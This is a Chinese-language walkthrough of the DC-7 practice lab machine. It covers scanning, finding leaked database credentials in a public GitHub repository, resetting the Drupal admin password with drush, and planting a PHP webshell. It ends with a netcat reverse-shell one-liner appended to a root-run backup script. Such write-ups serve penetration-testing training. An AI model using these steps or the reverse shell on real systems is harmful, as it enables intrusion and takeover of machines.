DC-7
难度:一般(原文为“While this isn’t an overly technical challenge, it isn’t exactly easy.”)
提示way不在box中。(英文很菜,不知道怎么翻译这句。)
信息搜集
1、使用Nmap探测靶机并进行详细扫描。
2、访问80端口搜集信息。
提示way在盒子之外,结合给出的@DC7USER
Google搜索DC7USER。
所以在kali上运行命令将文件下载至本地。
git clone https://github.com/Dc7User/staffdb
从config.php中发现数据库用户名密码。
dc7user:MdR3xOgB7#dW
漏洞挖掘与利用
使用ssh登录
backups中有两个加密文件无法读取。
查看dc7user中的mbox。
从格式上看文件应该是邮件。
从内容上看:
查看该文件。
只有drush这个命令不知道有什么用。
搜索后发现,可以进行更改密码。
无法修改root用户,搜索后发现只能在网站根目录使用此命令进行修改密码。
尝试更改drupal的admin用户密码。
登录drupal
由于Drupal为了安全,将php打包为单独的模块,所以需要先安装php模块
安装并启动后,在修改主页代码,插入php木马代码,并将文本格式改为php代码。
使用shell链接。
提权
之前得知backups.sh拥有者为www-data。
所以使用冰蝎反弹shell。
该工具还可以用来反弹到Metepreter。又有本靶机不需要进行后渗透测试以及横向移动,所以只进行Shell反弹。
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.44 9876 >/tmp/f" >> backups.sh